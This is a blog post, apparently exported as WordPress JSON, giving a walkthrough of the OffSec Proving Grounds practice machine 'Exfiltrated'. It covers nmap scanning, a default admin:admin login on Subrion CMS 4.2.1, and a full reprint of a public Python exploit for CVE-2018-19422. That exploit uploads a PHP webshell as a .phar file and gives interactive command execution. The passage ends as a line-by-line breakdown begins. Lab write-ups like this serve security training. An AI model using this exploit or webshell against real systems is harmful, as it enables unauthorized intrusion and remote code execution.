{"id":262,"date":"2024-06-10T18:24:45","date_gmt":"2024-06-10T18:24:45","guid":{"rendered":"https:\/\/bencron.com\/?p=262"},"modified":"2024-06-21T19:12:28","modified_gmt":"2024-06-21T19:12:28","slug":"exfiltrated-offsec-proving-grounds-practice","status":"publish","type":"post","link":"https:\/\/bencron.com\/?p=262","title":{"rendered":"Exfiltrated – Offsec Proving Grounds (Practice)"},"content":{"rendered":"\n

The Summary<\/h2>\n\n\n\n
Platform Site<\/strong><\/td>OffSec Proving Grounds (Practice)<\/td><\/tr>
Hostname<\/strong><\/td>exfiltrated<\/td><\/tr>
Domain<\/strong><\/td>exfiltrated.offsec<\/td><\/tr>
Operating System \/ Architecture<\/strong><\/td>linux<\/td><\/tr>
Rating<\/strong><\/td>Easy<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

I am going to be attacking the Exfiltrated machine on Offsec Proving Grounds. This report will involve scanning and service enumeration, leading to the initial foothold on the machine. Explanations of the foothold will be given. Privilege escalation will obtained by the manipulation of an image and discovering a known vullnerabilty within an installed application. <\/p>\n\n\n\n

It will be followed with a debreif, discussing what went right and wrong wiht breaking the machine and\/or the process of creating the write-up.<\/p>\n\n\n\n

The Attack<\/h2>\n\n\n\n

Scanning & Prelims<\/h3>\n\n\n\n

Once the testing environment is setup and full connectivity is confirmed, I run an nmap scan with he following command. After is a list explaining the command, followed by the output of the action.<\/p>\n\n\n\n

NMAP Command<\/p>\n\n\n\n

nmap -T4 -A -p- xx.xx.xx.xx -oA nmap-XXXXXXX --webxml<\/code><\/pre>\n\n\n\n
    \n
  • nmap  –> the application<\/li>\n\n\n\n
  • -T4  –> timing set to aggressive (4)<\/li>\n\n\n\n
  • -A -p-  –> enables all scans & scans all ports<\/li>\n\n\n\n
  • xx.xx.xx.xx  –> target IP address<\/li>\n\n\n\n
  • -oA  –> output All file types: normal, grepable, XML<\/li>\n\n\n\n
  • nmap-XXXXXX  –> names of output files (XXXX changes per testers choice)<\/li>\n\n\n\n
  • –webxml  –> can move & view the XML easily on another machine<\/li>\n<\/ul>\n\n\n\n
    NMAP – Output<\/span>
    Host is up (0.031s latency).<\/span><\/span>\nNot shown: 65533 closed tcp ports (reset)<\/span><\/span>\nPORT   STATE SERVICE VERSION<\/span><\/span>\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)<\/span><\/span>\n| ssh-hostkey: <\/span><\/span>\n|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)<\/span><\/span>\n|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)<\/span><\/span>\n|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)<\/span><\/span>\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))<\/span><\/span>\n| http-robots.txt: 7 disallowed entries <\/span><\/span>\n| \/backup\/ \/cron\/? \/front\/ \/install\/ \/panel\/ \/tmp\/ <\/span><\/span>\n|_\/updates\/<\/span><\/span>\n|_http-title: Did not follow redirect to http:\/\/exfiltrated.offsec\/<\/span><\/span>\n|_http-server-header: Apache\/2.4.41 (Ubuntu)<\/span><\/span>\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).<\/span><\/span>\nTCP\/IP fingerprint:<\/span><\/span>\nOS:SCAN(V=7.93%E=4%D=4\/30%OT=22%CT=1%CU=30563%PV=Y%DS=4%DC=T%G=Y%TM=66317CE<\/span><\/span>\nOS:5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=2%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=M<\/span><\/span>\nOS:551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%<\/span><\/span>\nOS:O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%<\/span><\/span>\nOS:DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=<\/span><\/span>\nOS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)<\/span><\/span>\nOS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=CD<\/span><\/span>\nOS:8F%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
    While scanning I set up notes for this machine. I also edit the \/etc\/hosts<\/code> file in Kali to associate a domain of my choosing to the IP address provided by the Platform Site. The entry is often added to during testing when new domains are found.<\/p>\n\n\n\n
    Service Enumeration<\/h3>\n\n\n\n
    NMAP – Output<\/span><\/path><\/path><\/svg><\/span>
    22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)<\/span><\/span>\n| ssh-hostkey: <\/span><\/span>\n|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)<\/span><\/span>\n|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)<\/span><\/span>\n|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    “It’s never SSH.” Well, almost never. It is best to try other services first.<\/p>\n\n\n\n
    NMAP – Output<\/span><\/path><\/path><\/svg><\/span>
    80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))<\/span><\/span>\n| http-robots.txt: 7 disallowed entries <\/span><\/span>\n| \/backup\/ \/cron\/? \/front\/ \/install\/ \/panel\/ \/tmp\/ <\/span><\/span>\n|_\/updates\/<\/span><\/span>\n|_http-title: Did not follow redirect to http:\/\/exfiltrated.offsec\/<\/span><\/span>\n|_http-server-header: Apache\/2.4.41 (Ubuntu)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    Since the only other service is HTTP, it is almost a certainty that something is amiss with it.<\/p>\n\n\n\n
    Going to the site, the homepage shows a login link.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Trying basic credentials of admin:admin brings success.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    This provides access to the Admin Dashboard (through the gear icon).<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Although the previous page mention Subrion, the admin dashboard confirms this and scrolling to the bottom reveals a version number. Subrion CMS v 4.2.1<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
     A search shows that Subrion CMS is a PHP\/MySQL based frame work. The search also shows a public exploit is available. This can be copied from the Exploit-DB website. I like to grab them locally using searchsploit.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    I like to make a copy of the exploit to the project directory for editing using the mirror flag (-m). Highlight the Path –> Copy (shift+ctrl+C) –> type: searchsploit -m –> Paste (shift+ctrl+V) –> execute (Enter).<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    This exploit requires access to the dashboard panel and valid credentials, which I have both.<\/p>\n\n\n\n
    The Foothold<\/h3>\n\n\n\n
    Upon opening the Python exploit file, I discovered it requires the BeautifulSoup module. This is not a standard module and will require installing for some people. Figured it may be good to show how to set up a virtual environment.<\/p>\n\n\n\n
    I like to set one up in each project folder when I am going to use python. I like that it keeps the required modules for that specific project isolated to that project directory and it doesn’t effect the global install of Python. I’ve managed to ruin my global install of Python before and this isolated any mistakes I mat make. Another benefit is you can easily fire up older versions of Python2 for older scripts that were crafted in it and have not been updated.<\/p>\n\n\n\n
    Be sure you are working in your project directory an run the following commands<\/p>\n\n\n\n
    virtualenv venv<\/code><\/pre>\n\n\n\n
    This will create the virtual environment directory (called “venv”, can name whatever you wish) in your working directory.<\/p>\n\n\n\n
    source venv\/bin\/activate<\/code><\/pre>\n\n\n\n
    This executes the source command. Source command, a built in feature of the shell, allows you to grab commands from a file and use them directly in the terminal. It happens within the current shell, without spawning anything new. After running, you will “magically” see a change in the command line.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    The appearance of the virtualenv directory (venv). This indicates you are now working within that virtual directory. You can now traverse to any other directory and still remain in that venv environment.<\/p>\n\n\n\n
    You can close the virtual environment at any time by using: deactivate. And enter again using the source command.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Getting the exploit running will involve installing some python modules into the virtual environment. this is done with: pip<\/code>. To see what modules are installed, use: pip list<\/code><\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    I’m not sure what the proper way to install these modules is. But I generally just run the script and it will throw an error, letting you know what modules it is asking for. I then install it with: pip install <moduleName><\/code>.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Keep running the script and installing modules until it runs properly. You can run : pip list<\/code> again to view what modules are installed in the virtual environment.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    The script has a help option that shows a bit more on how to run the script, the syntax is: python exploit.py -u http:\/\/target\/panel -l username -p password<\/code><\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    We now have a shell. At this point, you can proceed to the privilege escalation section if you want to view the next stage of attack. But, I am going to continue to break this script down to get to better understand what is happening.<\/p>\n\n\n\n
    Script Breakdown<\/h4>\n\n\n\n
    Python<\/span><\/span><\/path><\/path><\/svg><\/span>
    #!\/usr\/bin\/python3<\/span><\/span>\n<\/span>\nimport<\/span> requests<\/span><\/span>\nimport<\/span> time<\/span><\/span>\nimport<\/span> optparse<\/span><\/span>\nimport<\/span> random<\/span><\/span>\nimport<\/span> string<\/span><\/span>\nfrom<\/span> bs4 <\/span>import<\/span> BeautifulSoup<\/span><\/span>\n<\/span>\nparser <\/span>=<\/span> optparse<\/span>.<\/span>OptionParser<\/span>()<\/span><\/span>\nparser<\/span>.<\/span>add_option<\/span>(<\/span>'<\/span>-u<\/span>'<\/span>,<\/span> <\/span>'<\/span>--url<\/span>'<\/span>,<\/span> <\/span>action<\/span>=<\/span>"<\/span>store<\/span>"<\/span>,<\/span> <\/span>dest<\/span>=<\/span>"<\/span>url<\/span>"<\/span>,<\/span> <\/span>help<\/span>=<\/span>"<\/span>Base target uri http:\/\/target\/panel<\/span>"<\/span>)<\/span><\/span>\nparser<\/span>.<\/span>add_option<\/span>(<\/span>'<\/span>-l<\/span>'<\/span>,<\/span> <\/span>'<\/span>--user<\/span>'<\/span>,<\/span> <\/span>action<\/span>=<\/span>"<\/span>store<\/span>"<\/span>,<\/span> <\/span>dest<\/span>=<\/span>"<\/span>user<\/span>"<\/span>,<\/span> <\/span>help<\/span>=<\/span>"<\/span>User credential to login<\/span>"<\/span>)<\/span><\/span>\nparser<\/span>.<\/span>add_option<\/span>(<\/span>'<\/span>-p<\/span>'<\/span>,<\/span> <\/span>'<\/span>--passw<\/span>'<\/span>,<\/span> <\/span>action<\/span>=<\/span>"<\/span>store<\/span>"<\/span>,<\/span> <\/span>dest<\/span>=<\/span>"<\/span>passw<\/span>"<\/span>,<\/span> <\/span>help<\/span>=<\/span>"<\/span>Password credential to login<\/span>"<\/span>)<\/span><\/span>\n<\/span>\noptions<\/span>,<\/span> args <\/span>=<\/span> parser<\/span>.<\/span>parse_args<\/span>()<\/span><\/span>\n<\/span>\nif<\/span> <\/span>not<\/span> options<\/span>.<\/span>url<\/span>:<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Specify an url target<\/span>'<\/span>)<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Example usage: exploit.py -u http:\/\/target-uri\/panel<\/span>'<\/span>)<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Example help usage: exploit.py -h<\/span>'<\/span>)<\/span><\/span>\n    <\/span>exit<\/span>()<\/span><\/span>\n<\/span>\nurl_login <\/span>=<\/span> options<\/span>.<\/span>url<\/span><\/span>\nurl_upload <\/span>=<\/span> options<\/span>.<\/span>url<\/span> <\/span>+<\/span> <\/span>'<\/span>uploads\/read.json<\/span>'<\/span><\/span>\nurl_shell <\/span>=<\/span> options<\/span>.<\/span>url<\/span> <\/span>+<\/span> <\/span>'<\/span>uploads\/<\/span>'<\/span><\/span>\nusername <\/span>=<\/span> options<\/span>.<\/span>user<\/span><\/span>\npassword <\/span>=<\/span> options<\/span>.<\/span>passw<\/span><\/span>\n<\/span>\nsession <\/span>=<\/span> requests<\/span>.<\/span>Session<\/span>()<\/span><\/span>\n<\/span>\ndef<\/span> <\/span>login<\/span>():<\/span><\/span>\n    <\/span>global<\/span> csrfToken<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 <\/span>\\n<\/span>'<\/span>)<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Trying to connect to: <\/span>'<\/span> <\/span>+<\/span> url_login<\/span>)<\/span><\/span>\n    <\/span>try<\/span>:<\/span><\/span>\n        get_token_request <\/span>=<\/span> session<\/span>.<\/span>get<\/span>(<\/span>url_login<\/span>)<\/span><\/span>\n        soup <\/span>=<\/span> <\/span>BeautifulSoup<\/span>(<\/span>get_token_request<\/span>.<\/span>text<\/span>,<\/span> <\/span>'<\/span>html.parser<\/span>'<\/span>)<\/span><\/span>\n        csrfToken <\/span>=<\/span> soup<\/span>.<\/span>find<\/span>(<\/span>'<\/span>input<\/span>'<\/span>,<\/span>attrs<\/span> <\/span>=<\/span> <\/span>{<\/span>'<\/span>name<\/span>'<\/span>:<\/span>'<\/span>__st<\/span>'<\/span>})[<\/span>'<\/span>value<\/span>'<\/span>]<\/span><\/span>\n        <\/span>print<\/span>(<\/span>'<\/span>[+] Success!<\/span>'<\/span>)<\/span><\/span>\n        time<\/span>.<\/span>sleep<\/span>(<\/span>1<\/span>)<\/span><\/span>\n<\/span>\n        <\/span>if<\/span> csrfToken<\/span>:<\/span><\/span>\n            <\/span>print<\/span>(<\/span>f<\/span>"[+] Got CSRF token: <\/span>{<\/span>csrfToken<\/span>}<\/span>"<\/span>)<\/span><\/span>\n            <\/span>print<\/span>(<\/span>"<\/span>[+] Trying to log in...<\/span>"<\/span>)<\/span><\/span>\n<\/span>\n            auth_url <\/span>=<\/span> url_login<\/span><\/span>\n            auth_cookies <\/span>=<\/span> <\/span>{<\/span>"<\/span>loader<\/span>"<\/span>:<\/span> <\/span>"<\/span>loaded<\/span>"<\/span>}<\/span><\/span>\n            auth_headers <\/span>=<\/span> <\/span>{<\/span>"<\/span>User-Agent<\/span>"<\/span>:<\/span> <\/span>"<\/span>Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0<\/span>"<\/span>,<\/span> <\/span>"<\/span>Accept<\/span>"<\/span>:<\/span> <\/span>"<\/span>text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8<\/span>"<\/span>,<\/span> <\/span>"<\/span>Accept-Language<\/span>"<\/span>:<\/span> <\/span>"<\/span>pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3<\/span>"<\/span>,<\/span> <\/span>"<\/span>Accept-Encoding<\/span>"<\/span>:<\/span> <\/span>"<\/span>gzip, deflate<\/span>"<\/span>,<\/span> <\/span>"<\/span>Content-Type<\/span>"<\/span>:<\/span> <\/span>"<\/span>application\/x-www-form-urlencoded<\/span>"<\/span>,<\/span> <\/span>"<\/span>Origin<\/span>"<\/span>:<\/span> <\/span>"<\/span>http:\/\/192.168.1.20<\/span>"<\/span>,<\/span> <\/span>"<\/span>Connection<\/span>"<\/span>:<\/span> <\/span>"<\/span>close<\/span>"<\/span>,<\/span> <\/span>"<\/span>Referer<\/span>"<\/span>:<\/span> <\/span>"<\/span>http:\/\/192.168.1.20\/panel\/<\/span>"<\/span>,<\/span> <\/span>"<\/span>Upgrade-Insecure-Requests<\/span>"<\/span>:<\/span> <\/span>"<\/span>1<\/span>"<\/span>}<\/span><\/span>\n            auth_data <\/span>=<\/span> <\/span>{<\/span>"<\/span>__st<\/span>"<\/span>:<\/span> csrfToken<\/span>,<\/span> <\/span>"<\/span>username<\/span>"<\/span>:<\/span> username<\/span>,<\/span> <\/span>"<\/span>password<\/span>"<\/span>:<\/span> password<\/span>}<\/span><\/span>\n            auth <\/span>=<\/span> session<\/span>.<\/span>post<\/span>(<\/span>auth_url<\/span>,<\/span> <\/span>headers<\/span>=<\/span>auth_headers<\/span>,<\/span> <\/span>cookies<\/span>=<\/span>auth_cookies<\/span>,<\/span> <\/span>data<\/span>=<\/span>auth_data<\/span>)<\/span><\/span>\n<\/span>\n            <\/span>if<\/span> <\/span>len<\/span>(<\/span>auth<\/span>.<\/span>text<\/span>)<\/span> <\/span><=<\/span> <\/span>7000<\/span>:<\/span><\/span>\n                <\/span>print<\/span>(<\/span>'<\/span>\\n<\/span>[x] Login failed... Check credentials<\/span>'<\/span>)<\/span><\/span>\n                <\/span>exit<\/span>()<\/span><\/span>\n            <\/span>else<\/span>:<\/span><\/span>\n                <\/span>print<\/span>(<\/span>'<\/span>[+] Login Successful!<\/span>\\n<\/span>'<\/span>)<\/span><\/span>\n        <\/span>else<\/span>:<\/span><\/span>\n            <\/span>print<\/span>(<\/span>'<\/span>[x] Failed to got CSRF token<\/span>'<\/span>)<\/span><\/span>\n            <\/span>exit<\/span>()<\/span><\/span>\n<\/span>\n    <\/span>except<\/span> requests<\/span>.<\/span>exceptions<\/span>.<\/span>ConnectionError<\/span> <\/span>as<\/span> err<\/span>:<\/span><\/span>\n        <\/span>print<\/span>(<\/span>'<\/span>\\n<\/span>[x] Failed to Connect in: <\/span>'<\/span>+<\/span>url_login<\/span>+<\/span>'<\/span> <\/span>'<\/span>)<\/span><\/span>\n        <\/span>print<\/span>(<\/span>'<\/span>[x] This host seems to be Down<\/span>'<\/span>)<\/span><\/span>\n        <\/span>exit<\/span>()<\/span><\/span>\n<\/span>\n    <\/span>return<\/span> csrfToken<\/span><\/span>\n<\/span>\ndef<\/span> <\/span>name_rnd<\/span>():<\/span><\/span>\n    <\/span>global<\/span> shell_name<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Generating random name for Webshell...<\/span>'<\/span>)<\/span><\/span>\n    shell_name <\/span>=<\/span> <\/span>''<\/span>.<\/span>join<\/span>((<\/span>random<\/span>.<\/span>choice<\/span>(<\/span>string<\/span>.<\/span>ascii_lowercase<\/span>)<\/span> <\/span>for<\/span> x <\/span>in<\/span> range<\/span>(<\/span>15<\/span>)))<\/span><\/span>\n    time<\/span>.<\/span>sleep<\/span>(<\/span>1<\/span>)<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Generated webshell name: <\/span>'<\/span>+<\/span>shell_name<\/span>+<\/span>'<\/span>\\n<\/span>'<\/span>)<\/span><\/span>\n<\/span>\n    <\/span>return<\/span> shell_name<\/span><\/span>\n<\/span>\ndef<\/span> <\/span>shell_upload<\/span>():<\/span><\/span>\n    <\/span>print<\/span>(<\/span>'<\/span>[+] Trying to Upload Webshell..<\/span>'<\/span>)<\/span><\/span>\n    <\/span>try<\/span>:<\/span><\/span>\n        up_url <\/span>=<\/span> url_upload<\/span><\/span>\n        up_cookies <\/span>=<\/span> <\/span>{<\/span>"<\/span>INTELLI_06c8042c3d<\/span>"<\/span>:<\/span> <\/span>"<\/span>15ajqmku31n5e893djc8k8g7a0<\/span>"<\/span>,<\/span> <\/span>"<\/span>loader<\/span>"<\/span>:<\/span> <\/span>"<\/span>loaded<\/span>"<\/span>}<\/span><\/span>\n        up_headers <\/span>=<\/span> <\/span>{<\/span>"<\/span>User-Agent<\/span>"<\/span>:<\/span> <\/span>"<\/span>Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0<\/span>"<\/span>,<\/span> <\/span>"<\/span>Accept<\/span>"<\/span>:<\/span> <\/span>"<\/span>*\/*<\/span>"<\/span>,<\/span> <\/span>"<\/span>Accept-Language<\/span>"<\/span>:<\/span> <\/span>"<\/span>pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3<\/span>"<\/span>,<\/span> <\/span>"<\/span>Accept-Encoding<\/span>"<\/span>:<\/span> <\/span>"<\/span>gzip, deflate<\/span>"<\/span>,<\/span> <\/span>"<\/span>Content-Type<\/span>"<\/span>:<\/span> <\/span>"<\/span>multipart\/form-data; boundary=---------------------------6159367931540763043609390275<\/span>"<\/span>,<\/span> <\/span>"<\/span>Origin<\/span>"<\/span>:<\/span> <\/span>"<\/span>http:\/\/192.168.1.20<\/span>"<\/span>,<\/span> <\/span>"<\/span>Connection<\/span>"<\/span>:<\/span> <\/span>"<\/span>close<\/span>"<\/span>,<\/span> <\/span>"<\/span>Referer<\/span>"<\/span>:<\/span> <\/span>"<\/span>http:\/\/192.168.1.20\/panel\/uploads\/<\/span>"<\/span>}<\/span><\/span>\n        up_data <\/span>=<\/span> <\/span>"<\/span>-----------------------------6159367931540763043609390275<\/span>\\r\\n<\/span>Content-Disposition: form-data; name=<\/span>\\"<\/span>reqid<\/span>\\"\\r\\n\\r\\n<\/span>17978446266285<\/span>\\r\\n<\/span>-----------------------------6159367931540763043609390275<\/span>\\r\\n<\/span>Content-Disposition: form-data; name=<\/span>\\"<\/span>cmd<\/span>\\"\\r\\n\\r\\n<\/span>upload<\/span>\\r\\n<\/span>-----------------------------6159367931540763043609390275<\/span>\\r\\n<\/span>Content-Disposition: form-data; name=<\/span>\\"<\/span>target<\/span>\\"\\r\\n\\r\\n<\/span>l1_Lw<\/span>\\r\\n<\/span>-----------------------------6159367931540763043609390275<\/span>\\r\\n<\/span>Content-Disposition: form-data; name=<\/span>\\"<\/span>__st<\/span>\\"\\r\\n\\r\\n<\/span>"<\/span>+<\/span>csrfToken<\/span>+<\/span>"<\/span>\\r\\n<\/span>-----------------------------6159367931540763043609390275<\/span>\\r\\n<\/span>Content-Disposition: form-data; name=<\/span>\\"<\/span>upload[]<\/span>\\"<\/span>; filename=<\/span>\\"<\/span>"<\/span>+<\/span>shell_name<\/span>+<\/span>"<\/span>.phar<\/span>\\"\\r\\n<\/span>Content-Type: application\/octet-stream<\/span>\\r\\n\\r\\n<\/span><?php system($_GET['cmd']); ?><\/span>\\n\\r\\n<\/span>-----------------------------6159367931540763043609390275<\/span>\\r\\n<\/span>Content-Disposition: form-data; name=<\/span>\\"<\/span>mtime[]<\/span>\\"\\r\\n\\r\\n<\/span>1621210391<\/span>\\r\\n<\/span>-----------------------------6159367931540763043609390275--<\/span>\\r\\n<\/span>"<\/span><\/span>\n        session<\/span>.<\/span>post<\/span>(<\/span>up_url<\/span>,<\/span> <\/span>headers<\/span>=<\/span>up_headers<\/span>,<\/span> <\/span>cookies<\/span>=<\/span>up_cookies<\/span>,<\/span> <\/span>data<\/span>=<\/span>up_data<\/span>)<\/span><\/span>\n<\/span>\n    <\/span>except<\/span> requests<\/span>.<\/span>exceptions<\/span>.<\/span>HTTPError<\/span> <\/span>as<\/span> conn<\/span>:<\/span><\/span>\n        <\/span>print<\/span>(<\/span>'<\/span>[x] Failed to Upload Webshell in: <\/span>'<\/span>+<\/span>url_upload<\/span>+<\/span>'<\/span> <\/span>'<\/span>)<\/span><\/span>\n        <\/span>exit<\/span>()<\/span><\/span>\n<\/span>\ndef<\/span> <\/span>code_exec<\/span>():<\/span><\/span>\n    <\/span>try<\/span>:<\/span><\/span>\n        url_clean <\/span>=<\/span> url_shell<\/span>.<\/span>replace<\/span>(<\/span>'<\/span>\/panel<\/span>'<\/span>,<\/span> <\/span>''<\/span>)<\/span><\/span>\n        req <\/span>=<\/span> session<\/span>.<\/span>get<\/span>(<\/span>url_clean <\/span>+<\/span> shell_name <\/span>+<\/span> <\/span>'<\/span>.phar?cmd=id<\/span>'<\/span>)<\/span><\/span>\n<\/span>\n        <\/span>if<\/span> req<\/span>.<\/span>status_code<\/span> <\/span>==<\/span> <\/span>200<\/span>:<\/span><\/span>\n            <\/span>print<\/span>(<\/span>'<\/span>[+] Upload Success... Webshell path: <\/span>'<\/span> <\/span>+<\/span> url_shell <\/span>+<\/span> shell_name <\/span>+<\/span> <\/span>'<\/span>.phar <\/span>\\n<\/span>'<\/span>)<\/span><\/span>\n            <\/span>while<\/span> <\/span>True:<\/span><\/span>\n                cmd <\/span>=<\/span> <\/span>input<\/span>(<\/span>'<\/span>$ <\/span>'<\/span>)<\/span><\/span>\n                x <\/span>=<\/span> session<\/span>.<\/span>get<\/span>(<\/span>url_clean <\/span>+<\/span> shell_name <\/span>+<\/span> <\/span>'<\/span>.phar?cmd=<\/span>'<\/span>+<\/span>cmd<\/span>+<\/span>''<\/span>)<\/span><\/span>\n                <\/span>print<\/span>(<\/span>x<\/span>.<\/span>text<\/span>)<\/span><\/span>\n        <\/span>else<\/span>:<\/span><\/span>\n            <\/span>print<\/span>(<\/span>'<\/span>\\n<\/span>[x] Webshell not found... upload seems to have failed<\/span>'<\/span>)<\/span><\/span>\n    <\/span>except<\/span>:<\/span><\/span>\n        <\/span>print<\/span>(<\/span>'<\/span>\\n<\/span>[x] Failed to execute PHP code...<\/span>'<\/span>)<\/span><\/span>\n<\/span>\nlogin<\/span>()<\/span><\/span>\nname_rnd<\/span>()<\/span><\/span>\nshell_upload<\/span>()<\/span><\/span>\ncode_exec<\/span>()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    Above is the entire python public exploit script if you wish to scroll through or copy. I will be breaking it down into sections with explanations of what is happening to give a better idea of how the script works.<\/p>\n\n\n\n
    \n\n\n\n
    Python<\/span><\/span><\/path><\/path><\/svg><\/span>
    import<\/span> requests<\/span><\/span>\nimport<\/span> time<\/span><\/span>\nimport<\/span> optparse<\/span><\/span>\nimport<\/span> random<\/span><\/span>\nimport<\/span> string<\/span><\/span>\nfrom<\/span> bs4 <\/span>import<\/span> BeautifulSoup<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    The script imports the following modules. This process is like gathering your tools for a project.<\/p>\n\n\n\n